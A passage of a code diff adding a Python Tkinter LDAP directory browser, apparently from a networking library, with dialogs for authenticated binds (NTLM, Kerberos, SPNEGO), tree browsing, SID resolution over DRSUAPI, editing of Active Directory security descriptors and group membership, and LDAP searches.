bindtypev.set(LDAP_BIND_MECHS.SASL_GSS_SPNEGO.value) + else: + domentry.configure(state=tk.DISABLED) + bindtypev.set(LDAP_BIND_MECHS.SICILY.value) + + # Handle dynamic UI + def bindtypechange(*args, **kwargs): + bindtype = LDAP_BIND_MECHS(bindtypev.get()) + if bindtype == LDAP_BIND_MECHS.SIMPLE: + domentry.config(state=tk.DISABLED) + encrbtn.config(state=tk.DISABLED) + encryptv.set(False) + elif bindtype == LDAP_BIND_MECHS.SICILY: + domentry.config(state=tk.DISABLED) + encrbtn.config(state=tk.NORMAL) + else: + domentry.config(state=tk.NORMAL, textvariable=domainv) + encrbtn.config(state=tk.NORMAL) + + bindtypev.trace("w", bindtypechange) + userf.focus() + + # Setup + if popup.run(): + # Cancelled + return + + # Get values + username = userv.get() + password = passwordv.get() + domain = domainv.get() + bindtype = LDAP_BIND_MECHS(bindtypev.get()) + encrypt = encryptv.get() + + # Bind ! + self.tprint("client.bind(%s, ...)" % bindtype) + try: + simple_username = None + simple_password = None + if bindtype == LDAP_BIND_MECHS.SIMPLE: + self.ssp = None + simple_username = username + simple_password = password + encrypt = False + elif bindtype == LDAP_BIND_MECHS.SICILY: + self.ssp = NTLMSSP( + UPN=username, + PASSWORD=password, + ) + elif bindtype == LDAP_BIND_MECHS.SASL_GSSAPI: + self.ssp = KerberosSSP( + UPN="%s@%s" % (username, domain), + SPN="ldap/%s" % self.host, + PASSWORD=password, + ) + elif bindtype == LDAP_BIND_MECHS.SASL_GSS_SPNEGO: + self.ssp = SPNEGOSSP( + [ + NTLMSSP( + UPN=username, + PASSWORD=password, + ), + KerberosSSP( + UPN="%s@%s" % (username, domain), + SPN="ldap/%s" % self.host, + PASSWORD=password, + ), + ] + ) + self.client.bind( + bindtype, + ssp=self.ssp, + simple_username=simple_username, + simple_password=simple_password, + encrypt=encrypt, + ) + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + # Reset SSP. + self.ssp = None + return + except Exception as ex: + self.tprint(str(ex)) + # Reset SSP. + self.ssp = None + raise + self.tprint("Authenticated.\n") + self.bound = True + + def tree(self, *args): + """ + Tree command. + """ + if not self.connected: + return + + # Get namingContexts from rootDSE + try: + results = self.client.search(attributes=["namingContexts"]) + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + + attrs = results.get("", None) # root + if attrs is None: + return + + if "namingContexts" in attrs: + self.tk_tree.delete(*self.tk_tree.get_children()) + for root in attrs["namingContexts"]: + self.tk_tree.insert("", "end", root, text=root) + + def _showsearchresult(self, baseObject, results): + """ + Display attributes search result + """ + if baseObject in results: + self.tprint("Dn: %s" % (baseObject or "(RootDSE)"), tags=["bold"]) + self.tprint( + "\n".join( + " %s%s: %s" + % ( + k, + "" if len(v) == 1 else " (%s)" % len(v), + self._format_attribute(k, v, crop=True), + ) + for k, v in sorted(results[baseObject].items(), key=lambda x: x[0]) + ) + + "\n" + ) + + def treedoubleclick(self, _): + """ + Action done on tree double-click. + """ + # Get clicked item + item = self.tk_tree.selection()[0] + + # Unclickable + if self.tk_tree.tag_has("unclickable", item): + return + + # Does it already have children? If so delete them. + self.tk_tree.delete(*self.tk_tree.get_children(item)) + + self.tprint("-----------\nExpanding base '%s'..." % item) + + # Get children + try: + results = self.client.search( + baseObject=item, + scope=1, + attributes=["1.1"], + ) + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + + # Add to tree + if not results: + self.tk_tree.insert(item, "end", text="No children", tags=("unclickable",)) + else: + for child in results: + self.tk_tree.insert(item, "end", child, text=child) + + # Get attributes + try: + results = self.client.search( + baseObject=item, + scope=0, + ) + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + + # Display + self._showsearchresult(item, results) + + def load_guids(self): + """ + Load the various guids: + - schemaIDguid + - propset + + This cache is used to resolve the GUIDs of objects in ACEs. + """ + if self.loadedSchemaIDGuids: + return True + + # Property set + self.guids.update( + ( + k, + { + "objectClass": ["propset"], + "name": v, + }, + ) + for k, v in LDAP_PROPERTY_SET.items() + ) + + # Control access + self.guids.update( + ( + k, + { + "objectClass": ["controlset access right"], + "name": v, + }, + ) + for k, v in LDAP_CONTROL_ACCESS_RIGHTS.items() + ) + + self.tprint("Resolving schemaIDguid... ", flush=True) + try: + results = self.client.search( + baseObject=self.rootDSE["schemaNamingContext"][0], + scope=1, + attributes=["lDAPDisplayName", "schemaIDGUID", "objectClass"], + ) + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return False + + self.guids.update( + { + uuid.UUID(bytes_le=v["schemaIDGUID"][0]): { + "objectClass": v["objectClass"], + "name": v["lDAPDisplayName"][0], + } + for v in results.values() + if "schemaIDGUID" in v + } + ) + + self.guidscombo.update({v["name"]: k for k, v in self.guids.items()}) + self.guidscomboobject.update( + { + v["name"]: k + for k, v in self.guids.items() + if "classSchema" in v["objectClass"] + } + ) + self.loadedSchemaIDGuids = True + self.tprint("OK !") + return True + + def _rslvtype(self, x): + """ + Resolve Object types GUIDs + """ + if x in self.guids: + return self.guids[x]["name"] + return str(x) + + def _rslvsid(self, x): + """ + Resolve SIDs + """ + if isinstance(x, WINNT_SID): + x = x.summary() + if x in self.sids: + return self.sids[x] + return x or "" + + def resolvesids(self, sids): + """ + Queue a list of SIDs for resolution. + They are then added to self.sids if successful. + """ + unknowns = [x for x in (y.summary() for y in sids) if x not in self.sids] + if not unknowns: + return + + # Perform a resolution using [MS-LSAT] LsarLookupSids3 + client = DCERPC_Client( + DCERPC_Transport.NCACN_IP_TCP, + ndr64=False, + auth_level=DCE_C_AUTHN_LEVEL.PKT_PRIVACY, + ssp=self.ssp, + ) + client.connect_and_bind(self.host, find_dcerpc_interface("drsuapi")) + + # 1. DRSBind + bind_resp = client.sr1_req( + IDL_DRSBind_Request( + puuidClientDsa=NTDSAPI_CLIENT_GUID, + pextClient=DRS_EXTENSIONS(rgb=bytes(DRS_EXTENSIONS_INT(Pid=1234))), + ) + ) + if bind_resp.status != 0: + self.tprint("Bind Request failed.") + bind_resp.show() + return + + # 2. DRSCrackNames + resp = client.sr1_req( + IDL_DRSCrackNames_Request( + hDrs=bind_resp.phDrs, + dwInVersion=1, + pmsgIn=NDRUnion( + tag=1, + value=DRS_MSG_CRACKREQ_V1( + CodePage=0x4E4, # + LocaleId=0x409, # US-EN + formatOffered=11, # SID + formatDesired=0xFFFFFFF2, # DS_USER_PRINCIPAL_NAME_FOR_LOGON + rpNames=unknowns, + ), + ), + ) + ) + if resp.status != 0: + self.tprint("DsCracknames Request failed.") + resp.show() + return + + # 3. parse results + for i, res in enumerate(resp.valueof("pmsgOut.pResult.rItems")): + if res.status != 0: + # Errored + continue + name = res.valueof("pName") + self.sids[unknowns[i]] = name.decode() + + # alias for combobox + self.sidscombo = {self._rslvsid(x): x for x in self.sids.keys()} + + def viewsec(self, *args): + """ + View security descriptor + """ + # Get clicked item + item = self.tk_tree.selection()[0] + + # Get SD + try: + results = self.client.search( + baseObject=item, + scope=0, + attributes=["ntSecurityDescriptor"], + controls=[ + LDAP_Control( + controlType="1.2.840.113556.1.4.801", + criticality=True, + controlValue=LDAP_serverSDFlagsControl( + flags="OWNER+GROUP+DACL+SACL", + ), + ) + ], + ) + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + + if item not in results: + return + + try: + nTSecurityDescriptor = SECURITY_DESCRIPTOR( + results[item]["nTSecurityDescriptor"][0] + ) + except LDAP_Exception as ex: + self.tprint( + "Error parsing the Security Descriptor: " + str(ex), + tags=["error"], + ) + return + + # Resolve the guids + if not self.load_guids(): + return + + # Pre-resolve all the SIDs. + owner = getattr(nTSecurityDescriptor, "OwnerSid", None) + group = getattr(nTSecurityDescriptor, "GroupSid", None) + _to_resolve = [ + owner, + group, + ] + if hasattr(nTSecurityDescriptor, "DACL"): + _to_resolve.extend(x.Sid for x in nTSecurityDescriptor.DACL.Aces) + if hasattr(nTSecurityDescriptor, "SACL"): + _to_resolve.extend(x.Sid for x in nTSecurityDescriptor.SACL.Aces) + self.resolvesids(_to_resolve) + + # Get dialog + popup = BasePopup(self.root) + dlg = popup.dlg + + # Security Descriptor UI + dlg.columnconfigure(0, weight=1) + dlg.rowconfigure(tuple(range(5)), weight=1) + + sidfrm = ttk.Frame(dlg) + sidfrm.grid(row=0, sticky="we") + sidfrm.grid_columnconfigure(1, weight=1) + + ownerv = tk.StringVar() + ownerv.set(self._rslvsid(owner)) + ttk.Label(sidfrm, text="Owner").grid(row=0, column=0, sticky="we") + ttk.Combobox( + sidfrm, textvariable=ownerv, values=list(self.sidscombo.keys()) + ).grid(row=0, column=1, sticky="we") + + groupv = tk.StringVar() + groupv.set(self._rslvsid(group)) + ttk.Label(sidfrm, text="Group").grid(row=1, column=0, sticky="we") + ttk.Combobox( + sidfrm, textvariable=groupv, values=list(self.sidscombo.keys()) + ).grid(row=1, column=1, sticky="we") + + sdcontrolfrm = ttk.LabelFrame( + dlg, + text="SD Control", + ) + sdflags = [ + "SELF_RELATIVE", + "DACL_PRESENT", + "SACL_PRESENT", + "OWNER_DEFAULTED", + "DACL_PROTECTED", + "SACL_PROTECTED", + "GROUP_DEFAULTED", + "DACL_AUTO_INHERITED", + "SACL_AUTO_INHERITED", + "RM_CONTROL_VALID", + "DACL_DEFAULTED", + "SACL_DEFAULTED", + "SERVER_SECURITY", + "DACL_COMPUTED", + "SACL_COMPUTED", + None, + "DACL_TRUSTED", + ] + sdvars = [None] * len(sdflags) + for i, sdflag in enumerate(sdflags): + if sdflag is None: + continue + sdvars[i] = tk.BooleanVar() + sdvars[i].set(getattr(nTSecurityDescriptor.Control, sdflag)) + ttk.Checkbutton(sdcontrolfrm, variable=sdvars[i], text=sdflag).grid( + row=(i // 3) * 4, column=(i % 3) * 4, columnspan=4, sticky="w" + ) + sdcontrolfrm.grid(row=1, sticky="we") + + def acegui(ace, parentdlg=dlg): + data = ace.extractData(accessMask=LDAP_DS_ACCESS_RIGHTS) + + # Sub-dialog + subpopup = BasePopup(parentdlg) + dlg = subpopup.dlg + + # Edit ACE UI + dlg.columnconfigure(1, weight=1) + dlg.rowconfigure(tuple(range(8)), weight=1) + + # Trustee + trusteev = tk.StringVar() + trusteev.set(self._rslvsid(data["sid-string"])) + ttk.Label(dlg, text="Trustee").grid(row=0, column=0, sticky="we") + ttk.Combobox( + dlg, textvariable=trusteev, values=list(self.sidscombo.keys()) + ).grid(row=0, column=1, sticky="we") + + # ACE type + ttk.Label(dlg, text="ACE type").grid(row=1, column=0, sticky="we") + acetypefrm = ttk.Frame( + dlg, + ) + acetypev = tk.IntVar() + acetypev.set(ace.AceType - 5 if ace.AceType >= 5 else ace.AceType) + ttk.Radiobutton( + acetypefrm, + variable=acetypev, + text="Allow", + value=0x00, + ).grid(row=0, column=0) + ttk.Radiobutton( + acetypefrm, + variable=acetypev, + text="Deny", + value=0x01, + ).grid(row=0, column=1) + ttk.Radiobutton( + acetypefrm, + variable=acetypev, + text="Audit", + value=0x02, + ).grid(row=0, column=2) + ttk.Radiobutton( + acetypefrm, + variable=acetypev, + text="Alarm", + value=0x03, + state=tk.DISABLED, + ).grid(row=0, column=3) + acetypefrm.grid(row=1, column=1, sticky="we") + + # Access Mask + accessmaskfrm = ttk.LabelFrame( + dlg, + text="Access Mask", + ) + sdvars = [None] * len(LDAP_DS_ACCESS_RIGHTS) + for i, maskval in enumerate(LDAP_DS_ACCESS_RIGHTS.values()): + sdvars[i] = tk.BooleanVar() + sdvars[i].set(getattr(data["mask"], maskval)) + ttk.Checkbutton(accessmaskfrm, variable=sdvars[i], text=maskval).grid( + row=i // 4, column=i % 4, sticky="w" + ) + accessmaskfrm.grid(row=2, column=0, columnspan=2, sticky="we") + + # ACE flags + aceflagsfrm = ttk.LabelFrame( + dlg, + text="Access Mask", + ) + aceflagsvars = [None] * len(WINNT_ACE_FLAGS) + for i, aceval in enumerate(WINNT_ACE_FLAGS.values()): + aceflagsvars[i] = tk.BooleanVar() + aceflagsvars[i].set(getattr(ace.AceFlags, aceval)) + ttk.Checkbutton( + aceflagsfrm, variable=aceflagsvars[i], text=aceval + ).grid(row=i // 4, column=i % 4, sticky="w") + aceflagsfrm.grid(row=3, column=0, columnspan=2, sticky="we") + + # Object type + objecttypev = tk.StringVar() + objecttypev.set(self._rslvtype(data["object-guid"]) or "None") + ttk.Label(dlg, text="Object type").grid(row=5, column=0, sticky="we") + ttk.Combobox( + dlg, textvariable=objecttypev, values=list(self.guidscombo.keys()) + ).grid(row=5, column=1, sticky="we") + + # Inherited object type + inheritedobjecttypev = tk.StringVar() + inheritedobjecttypev.set( + self._rslvtype(data["inherited-object-guid"]) or "None" + ) + ttk.Label(dlg, text="Inherited object type").grid( + row=6, column=0, sticky="we" + ) + ttk.Combobox( + dlg, + textvariable=inheritedobjecttypev, + values=list(self.guidscomboobject.keys()), + ).grid(row=6, column=1, sticky="we") + + # OK / Cancel + btnfrm = ttk.Frame(dlg) + ttk.Button(btnfrm, text="OK", command=subpopup.dismiss).grid( + row=0, column=0 + ) + ttk.Button(btnfrm, text="Cancel", command=subpopup.cancel).grid( + row=0, column=1 + ) + btnfrm.grid(row=7) + + # Setup + if subpopup.run(): + # Cancelled + return + + # Get values + trustee = trusteev.get() + acetype = acetypev.get() + objecttype = objecttypev.get() + inheritedobjecttype = inheritedobjecttypev.get() + mask = 0 + for i, (sdvar, v) in enumerate( + zip(sdvars, list(LDAP_DS_ACCESS_RIGHTS.keys())) + ): + if sdvar is None: + continue + if sdvar.get(): + mask |= v + aceflags = 0 + for i, (aceflagvar, v) in enumerate( + zip(aceflagsvars, list(WINNT_ACE_FLAGS.keys())) + ): + if aceflagvar is None: + continue + if aceflagvar.get(): + aceflags |= v + + # Set back into ACE + if trustee in self.sidscombo: + Sid = WINNT_SID.fromstr(self.sidscombo[trustee]) + else: + Sid = WINNT_SID.fromstr(trustee) + if objecttype in self.guidscombo: + objecttype = self.guidscombo[objecttype] + elif objecttype: + objecttype = uuid.UUID(objecttype) + if inheritedobjecttype in self.guidscomboobject: + inheritedobjecttype = self.guidscomboobject[inheritedobjecttype] + elif inheritedobjecttype: + inheritedobjecttype = uuid.UUID(inheritedobjecttype) + Flags = 0 + if objecttype: + Flags |= 1 + if inheritedobjecttype: + Flags |= 2 + if acetype == 0x00: + if Flags: + ace.AceType = 0x05 + ace.payload = WINNT_ACCESS_ALLOWED_OBJECT_ACE( + Mask=mask, + Sid=Sid, + Flags=Flags, + ObjectType=objecttype, + InheritedObjectType=inheritedobjecttype, + ) + else: + ace.AceType = 0x00 + ace.payload = WINNT_ACCESS_ALLOWED_ACE( + Mask=mask, + Sid=Sid, + ) + elif acetype == 0x01: + if Flags: + ace.AceType = 0x06 + ace.payload = WINNT_ACCESS_DENIED_OBJECT_ACE( + Mask=mask, + Sid=Sid, + Flags=Flags, + ObjectType=objecttype, + InheritedObjectType=inheritedobjecttype, + ) + else: + ace.AceType = 0x01 + ace.payload = WINNT_ACCESS_DENIED_ACE( + Mask=mask, + Sid=Sid, + ) + elif acetype == 0x02: + if Flags: + ace.AceType = 0x07 + ace.payload = WINNT_SYSTEM_AUDIT_OBJECT_ACE( + Mask=mask, + Sid=Sid, + Flags=Flags, + ObjectType=objecttype, + InheritedObjectType=inheritedobjecttype, + ) + else: + ace.AceType = 0x02 + ace.payload = WINNT_SYSTEM_AUDIT_ACE( + Mask=mask, + Sid=Sid, + ) + else: + raise NotImplementedError + ace.AceFlags = aceflags + + def addace(id, table, ace, pos="end"): + data = ace.extractData(accessMask=LDAP_DS_ACCESS_RIGHTS) + table.insert( + "", + pos, + id, + values=( + ace.sprintf("%AceType%"), + self._rslvsid(data["sid-string"]), + str(data["mask"]) + + ( + " (%s)" % self._rslvtype(data["object-guid"]) + if data["object-guid"] + else "" + ), + ace.sprintf("%AceFlags%"), + ), + ) + + def acltable(name): + aclfrm = ttk.LabelFrame(dlg, text=name, borderwidth=0) + + tvfr = ttk.Frame(aclfrm) + tvfr.grid_columnconfigure(0, weight=1) + tvfr.grid_rowconfigure(0, weight=1) + + acltree = ttk.Treeview( + tvfr, show="headings", columns=("type", "trustee", "rights", "flags") + ) + acltree.heading("type", text="Type") + acltree.heading("trustee", text="Trustee") + acltree.heading("rights", text="Rights") + acltree.heading("flags", text="Flags") + + tree_scrollbar = AutoHideScrollbar( + tvfr, orient="vertical", command=acltree.yview + ) + acltree.configure(yscrollcommand=tree_scrollbar.set) + acltree.grid(row=0, column=0, sticky="nsew") + + # Populate + aclobj = getattr(nTSecurityDescriptor, name, None) + if aclobj is not None: + for i, ace in enumerate(aclobj.Aces): + addace(i, acltree, ace) + + def add(*_): + ace = WINNT_ACE_HEADER() / WINNT_ACCESS_ALLOWED_ACE() + acegui(ace) + # Append + aclobj.Aces.append(ace) + addace(len(aclobj.Aces) - 1, acltree, ace) + + def delete(*_): + try: + selected = int(acltree.selection()[0]) + del aclobj.Aces[selected] + except IndexError: + return + # Full refresh as indexes change. + acltree.delete(*acltree.get_children()) + for i, ace in enumerate(aclobj.Aces): + addace(i, acltree, ace) + + def edit(*_): + try: + selected = int(acltree.selection()[0]) + ace = aclobj.Aces[selected] + except IndexError: + return + acegui(ace) + # Update + acltree.delete(selected) + addace(selected, acltree, ace, pos=selected) + + btnfrm = ttk.Frame(aclfrm) + btnfrm.grid_columnconfigure(0, weight=1) + ttk.Button(btnfrm, text="Add", command=add).grid(row=0) + ttk.Button(btnfrm, text="Delete", command=delete).grid(row=1) + ttk.Button(btnfrm, text="Edit", command=edit).grid(row=2) + btnfrm.pack(side="right") + + tvfr.pack(fill="both", expand=True) + return aclfrm + + acltable("DACL").grid(row=2, sticky="we") + acltable("SACL").grid(row=3, sticky="we") + + btnfrm = ttk.Frame(dlg) + ttk.Button(btnfrm, text="Update", command=popup.dismiss).grid(row=0, column=0) + ttk.Button(btnfrm, text="Cancel", command=popup.cancel).grid(row=0, column=1) + btnfrm.grid(row=4) + + # Setup + if popup.run(): + # Cancelled + return + + # From UI back into ntSecurityDescriptor + + # Owner + owner = ownerv.get() + if owner in self.sidscombo: + nTSecurityDescriptor.OwnerSid = WINNT_SID.fromstr(self.sidscombo[owner]) + else: + nTSecurityDescriptor.OwnerSid = WINNT_SID.fromstr(owner) + + # Group + group = groupv.get() + if group in self.sidscombo: + nTSecurityDescriptor.GroupSid = WINNT_SID.fromstr(self.sidscombo[group]) + else: + nTSecurityDescriptor.GroupSid = WINNT_SID.fromstr(group) + + # Control + control = SECURITY_DESCRIPTOR(Control=0).Control + for i, (sdvar, v) in enumerate(zip(sdvars, sdflags)): + if sdvar is None: + continue + if sdvar.get(): + control |= v + nTSecurityDescriptor.Control = control + + # Pfew, we did it. That was some big UI. + + # Now update the SD. + try: + self.client.modify( + object=item, + changes=[ + LDAP_ModifyRequestChange( + operation="replace", + modification=LDAP_PartialAttribute( + type="ntSecurityDescriptor", + values=[ + LDAP_AttributeValue(value=bytes(nTSecurityDescriptor)) + ], + ), + ) + ], + controls=[ + LDAP_Control( + controlType="1.2.840.113556.1.4.801", + criticality=True, + controlValue=LDAP_serverSDFlagsControl( + flags="OWNER+GROUP+DACL+SACL", + ), + ) + ], + ) + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + + self.tprint("Security descriptor updated.") + + def _members_popup(self, selection, mode="memberof"): + """ + The base of the "Member Of" and "Members" popups + + :param mode: either "memberof" or "members" + """ + # Get clicked item + item = self.tk_tree.selection()[0] + + # Get the user attributes + try: + results = self.client.search( + baseObject=item, + scope=0, + attributes=["objectClass", "memberOf"], + ) + if item not in results: + raise ValueError("Bad output") + attributes = results[item] + except ValueError as ex: + self.tprint(str(ex)) + return + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + + # Check that this item is indeed, a user or a group + if not any(x in ["user", "group"] for x in attributes.get("objectClass", [])): + messagebox.showerror("Error", "Object is neither a user nor a group !") + return + + # Keep track of previous members, and changed ones + og_members = set(attributes.get("memberOf", [])) + members = list(og_members) + + # Get dialog + popup = BasePopup(self.root) + dlg = popup.dlg + + # "Member Of" UI + dlg.grid_rowconfigure(0, weight=1) + dlg.grid_columnconfigure(0, weight=1) + + memberoffrm = ttk.LabelFrame( + dlg, + text="Member Of", + ) + memberoffrm.grid_rowconfigure(0, weight=1) + memberoffrm.grid_columnconfigure(0, weight=1) + + # Members list + entrylist = tk.Listbox(memberoffrm) + entrylist.grid(row=0, sticky="new") + + def add(*_, parentdlg=dlg): + # Sub-dialog + subpopup = BasePopup(parentdlg) + dlg = subpopup.dlg + + # New group field + newgroupv = tk.StringVar() + ttk.Label(dlg, text="Group CN:").grid(row=0, sticky="we") + newgroupf = tk.Entry(dlg, textvariable=newgroupv) + newgroupf.grid(row=1, sticky="we") + + # OK / Cancel + btnfrm = ttk.Frame(dlg) + ttk.Button(btnfrm, text="OK", command=subpopup.dismiss).grid( + row=0, column=0 + ) + ttk.Button(btnfrm, text="Cancel", command=subpopup.cancel).grid( + row=0, column=1 + ) + btnfrm.grid(row=2, ipadx=5) + + # Focus + newgroupf.focus() + + if subpopup.run(): + return + + # Get results + newgroup = newgroupv.get() + + if newgroup: + # Store + members.append(newgroup) + # Display + entrylist.insert("end", newgroup) + + def delete(*_): + try: + selected = int(entrylist.curselection()[0]) + except IndexError: + return + # Drop + del members[selected] + # Remove from list + entrylist.delete(selected) + + # Add / Delete + btnfrm = ttk.Frame(memberoffrm) + ttk.Button(btnfrm, text="Add", command=add).grid(row=0, column=0) + ttk.Button(btnfrm, text="Delete", command=delete).grid(row=0, column=1) + btnfrm.grid(row=1, sticky="we") + + # Populate + for group in og_members: + entrylist.insert("end", group) + og_members.add(group) + + memberoffrm.grid(row=0, columnspan=2, sticky="we") + + # OK / Cancel + btnfrm = ttk.Frame(dlg) + ttk.Button(btnfrm, text="OK", command=popup.dismiss).grid(row=0, column=0) + ttk.Button(btnfrm, text="Cancel", command=popup.cancel).grid(row=0, column=1) + btnfrm.grid(row=1, ipadx=5) + + # Setup + if popup.run(): + # Cancelled + return + + # Get results + members = set(members) + to_add = members - og_members + to_rem = og_members - members + operations = [("add", x) for x in to_add] + [("delete", x) for x in to_rem] + + for op, group in operations: + # Run the operations: on multiple groups, add/remove ourselves from "member" + try: + results = self.client.modify( + object=group, + changes=[ + LDAP_ModifyRequestChange( + operation=op, + modification=LDAP_PartialAttribute( + type="member", + values=[LDAP_AttributeValue(value=item)], + ), + ) + ], + ) + except ValueError as ex: + self.tprint(str(ex)) + return + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + + self.tprint("Groups of '%s' updated !" % item) + + def editmemberof(self, *_): + """ + Edit popup for "Member Of" + """ + # Get clicked item + item = self.tk_tree.selection()[0] + + self._members_popup(item, "memberof") + + def _edit_popup(self, selection, mode="edit", editattrs={}): + """ + The base of the "Edit" and "Duplicate" popups + + :param mode: either "edit" or "new" + :param editattrs: existing attributes to edit + """ + # Get dialog + popup = BasePopup(self.root) + dlg = popup.dlg + + # Edit UI + dlg.grid_columnconfigure(1, weight=1) + + # DN + dnv = tk.StringVar() + dnv.set(selection) + if mode == "edit": + ttk.Label(dlg, text="DN:").grid(row=0, column=0, sticky="w") + else: + ttk.Label(dlg, text="New DN:").grid(row=0, column=0, sticky="w") + tk.Entry(dlg, textvariable=dnv).grid(row=0, column=1, sticky="we") + + # "Edit entry" sub-box + editentryfrm = ttk.LabelFrame( + dlg, + text="Edit Entry", + ) + attributev = tk.StringVar() + ttk.Label(editentryfrm, text="Attribute:").grid(row=0, column=0) + tk.Entry(editentryfrm, textvariable=attributev).grid( + row=0, column=1, sticky="we" + ) + + valuesv = tk.StringVar() + ttk.Label(editentryfrm, text="Values:").grid(row=1, column=0) + tk.Entry(editentryfrm, textvariable=valuesv).grid(row=1, column=1, sticky="we") + + # "Operation" subbox: the radio + the buttons + opsfrm = ttk.Frame(editentryfrm) + operationfrm = ttk.LabelFrame( + opsfrm, + text="Operation", + ) + scopev = tk.IntVar() + scopev.set(0) + ttk.Radiobutton( + operationfrm, + variable=scopev, + text="Add", + value=0, + ).grid(row=0, column=0) + ttk.Radiobutton( + operationfrm, + variable=scopev, + text="Delete", + value=1, + ).grid(row=0, column=1) + ttk.Radiobutton( + operationfrm, + variable=scopev, + text="Replace", + value=2, + ).grid(row=0, column=2) + operationfrm.grid(row=0, column=0, columnspan=2, sticky="we") + + if mode == "new": + # In 'new', the only allowed operation is 'Add' + for child in operationfrm.winfo_children(): + child.configure(state=tk.DISABLED) + + operations = [] + + def enterentrylist(): + """ + This is called to add an element to the "Entry List" + """ + op = scopev.get() + attr = attributev.get() + val = valuesv.get() + ident = "[%s]%s:%s" % ( + {0: "Add", 1: "Delete", 2: "Replace"}[op], + attr, + val, + ) + # Once we have an ident, actually parse the value entered by the user + try: + val = self._parse_attribute(attr, val) + except ValueError: + # Parsing failed, show a popup and return without clearing ! + return + # Get current selection and reset it + selected = self.currently_editing + self.currently_editing = None + # Do we have a selection + if selected is not None: + # Yes, edit + # Set in storage + operations[selected] = (op, attr, val) + # Re-add to display + entrylist.delete(selected) + entrylist.insert(selected, ident) + # Reset selection btw + entrylist.itemconfigure(selected, fg="black") + entrylist.see(selected) + else: + # No, create + # Add to storage + operations.append((op, attr, val)) + # Add to display + entrylist.insert("end", ident) + # Clear to really show we're done + scopev.set(0) + attributev.set("") + valuesv.set("") + + def editentrylist(): + """ + This is called to load an element from the "Entry List" + """ + try: + selected = int(entrylist.curselection()[0]) + except IndexError: + return + # If there's a previously edited (unfinished), clear + if self.currently_editing is not None: + entrylist.itemconfigure(self.currently_editing, fg="black") + # Set currently edited mode + self.currently_editing = selected + # Show selected item in blue + entrylist.itemconfigure(selected, fg="blue") + entrylist.selection_clear(selected) + + operation = operations[selected] + # Set textboxes + scopev.set(operation[0]) + attributev.set(operation[1]) + valuesv.set(self._format_attribute(operation[1], operation[2])) + + def removeentrylist(): + """ + This is called to remove an element from the "Entry List" + """ + try: + selected = entrylist.curselection()[0] + except IndexError: + return + # Remove from storage + del operations[selected] + # Remove from display + entrylist.delete(selected) + + ttk.Button( + opsfrm, + text="Enter", + command=enterentrylist, + ).grid(row=0, column=2) + + opsfrm.grid(row=2, column=0, columnspan=2) + editentryfrm.grid(row=1, column=0, columnspan=2) + + # Entry list + entrylistfrm = ttk.LabelFrame( + dlg, + text="Entry List", + ) + entrylistfrm.grid_columnconfigure(0, weight=1) + + entrylist = tk.Listbox(entrylistfrm) + entrylist.grid(row=0, sticky="we", padx=5) + + entrylistbtns = ttk.Frame(entrylistfrm) + ttk.Button( + entrylistbtns, + text="Edit", + command=editentrylist, + ).pack(side="left") + ttk.Button( + entrylistbtns, + text="Remove", + command=removeentrylist, + ).pack(side="right") + entrylistbtns.grid(row=1, sticky="we", padx=10) + + entrylistfrm.grid(row=3, column=0, columnspan=2, sticky="we", pady=5) + + if mode == "new": + for attr, val in editattrs.items(): + # Add to storage + operations.append((0, attr, val)) + # Add to display + ident = "[Add]%s:%s" % ( + attr, + self._format_attribute(attr, val), + ) + entrylist.insert("end", ident) + + # OK / Cancel + btnfrm = ttk.Frame(dlg) + ttk.Button(btnfrm, text="Run", command=popup.dismiss).pack(side="left") + ttk.Button(btnfrm, text="Cancel", command=popup.cancel).pack(side="right") + btnfrm.grid(row=4, column=0, columnspan=2, ipadx=10) + + # Setup + if popup.run(): + # Cancelled + return + + # Get values + dn = dnv.get() + + return dn, operations + + def edit(self, *args): + """ + Edit popup + """ + # Get selected item + try: + selection = self.tk_tree.selection()[0] + except IndexError: + selection = "" + + results = self._edit_popup(selection) + if not results: + return + dn, operations = results + + # Perform edit + try: + self.client.modify( + object=dn, + changes=[ + LDAP_ModifyRequestChange( + operation=op, + modification=LDAP_PartialAttribute( + type=attr, + values=[LDAP_AttributeValue(value=x) for x in values], + ), + ) + for (op, attr, values) in operations + ], + ) + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + + self.tprint("Modify request succeeded.") + + def search(self, *args): + """ + Search popup + """ + # Get selected item + try: + selection = self.tk_tree.selection()[0] + except IndexError: + selection = "rootDSE" + + # Get dialog + popup = BasePopup(self.root) + dlg = popup.dlg + + # Search UI + dlg.grid_columnconfigure(1, weight=1) + + basednv = tk.StringVar() + basednv.set(selection) + ttk.Label(dlg, text="Base DN").grid(row=0, column=0) + basednf = tk.Entry(dlg, textvariable=basednv) + basednf.grid(row=0, column=1, sticky="we") + + filterv = tk.StringVar() + filterv.set(self.lastSearchString) + ttk.Label(dlg, text="Filter").grid(row=1, column=0) + tk.Entry(dlg, textvariable=filterv).grid(row=1, column=1, sticky="we") + + scopefrm = ttk.LabelFrame( + dlg, + text="Scope", + ) + scopev = tk.IntVar() + scopev.set(1) + ttk.Radiobutton( + scopefrm, + variable=scopev, + text="Base", + value=0, + ).grid(row=0, column=0) + ttk.Radiobutton( + scopefrm, + variable=scopev, + text="One Level", + value=1, + ).grid(row=0, column=1) + ttk.Radiobutton( + scopefrm, + variable=scopev, + text="Subtree", + value=2, + ).grid(row=0, column=2) + scopefrm.grid(row=2, column=0, columnspan=2) + + ttk.Button(dlg, text="OK", command=popup.dismiss).grid(row=3, column=0) + ttk.Button(dlg, text="Cancel", 